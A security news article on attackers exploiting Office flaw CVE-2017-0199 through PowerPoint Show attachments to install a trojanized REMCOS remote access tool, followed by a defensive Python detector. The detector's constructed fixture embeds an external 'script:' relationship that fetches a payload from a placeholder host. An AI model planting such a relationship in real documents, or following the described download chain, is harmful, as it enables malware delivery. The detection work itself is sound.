Security researchers from Trend Micro warn that a Microsoft Office vulnerability patched in April has been exploited to distribute a RAT.
Initially, the zero-day remote code execution vulnerability, tracked as CVE-2017-0199, was used in attacks leveraging malicious Rich Text File (RTF) documents, exploiting a flaw in Office’s Object Linking and Embedding (OLE) interface to install malware such as the DRIDEX banking Trojan.
However, in the latest malware attacks CVE-2017-0199 is being exploited through a different delivery method: a PowerPoint Slide Show. In this case, the malicious file arrives as a spear-phishing email attachment, with the sender’s address disguised as that of a business partner.
The email message is usually an order request, though it includes no business documents. Instead, it carries a malicious PowerPoint Show (PPSX) file that is supposedly meant to leverage CVE-2017-8570, a different Microsoft Office vulnerability; this is most likely an error made by the toolkit developer.
As soon as the malicious file is opened, PowerPoint initializes the script moniker and runs the remote malicious payload via the PowerPoint Show animations feature. If CVE-2017-0199 is exploited successfully, the payload downloads a file called logo.doc, which is actually an XML file containing JavaScript code.
That JavaScript then runs a PowerShell command to download and execute RATMAN.EXE from its command and control (C&C) server. The file is a Trojanized version of REMCOS, a legitimate and customizable remote access tool (RAT), which, once executed, lets the attacker run remote commands on the user’s system.
The tool can be used for downloading and executing commands on the infected machine, for logging keystrokes and screen activity, as well as for recording audio and video using the system’s microphone and webcam.
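As an added illustration of how a defender could look for this delivery vector (example code written for this article, not Trend Micro’s), the following Python script unpacks a PPSX, which is an OOXML ZIP container, and flags relationship parts whose external target uses the `script:` moniker scheme. It assumes the script moniker appears as an external relationship target beginning with `script:`, as in the PPSX variant described above; the embedded sample document and its placeholder URL are constructed, not taken from any real campaign.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Constructed sample: a minimal slide relationship part of the kind found
# inside a PPSX. The external "script:" target is the indicator we look for;
# the URL is a placeholder, not an address from any real campaign.
SAMPLE_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>'
    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="script:http://placeholder.invalid/logo.doc" TargetMode="External"/>'
    '</Relationships>'
)


def build_sample_ppsx():
    """Build an in-memory PPSX-like ZIP containing the constructed rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


def find_external_rels(ppsx_bytes):
    """Return (part, rId, scheme, target) for every external relationship
    in any .rels part of the package, regardless of scheme."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(ppsx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                # Internal targets (layouts, media) are the normal case.
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                scheme = target.split(":", 1)[0].lower() if ":" in target else ""
                findings.append((name, rel.get("Id", ""), scheme, target))
    return findings


def script_moniker_hits(ppsx_bytes):
    """Keep only external targets that use the script: moniker scheme."""
    return [f for f in find_external_rels(ppsx_bytes) if f[2] == "script"]


if __name__ == "__main__":
    for part, rid, scheme, target in script_moniker_hits(build_sample_ppsx()):
        print(f"{part}: {rid} -> {target}")
```

Any external relationship in a slide is worth a second look; a `script:` target is a strong indicator of this exploitation technique and should be quarantined rather than opened.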
The Trojanized tool also uses an unknown .NET protector that adds obfuscation to hinder analysis, and it relies on encrypted communication with its C&C server.
“Ultimately, the use of a new method of attack is a practical consideration; since most detection methods for CVE-2017-0199 focus on the RTF method of attack, the use of a new vector—PPSX files—allows attackers to evade antivirus detection,” Trend Micro researchers say.
In addition, the experts point out that, “Users should also always patch their systems with the latest security updates. Given that Microsoft already addressed this vulnerability back in April, users with updated patches are safe from these attacks.”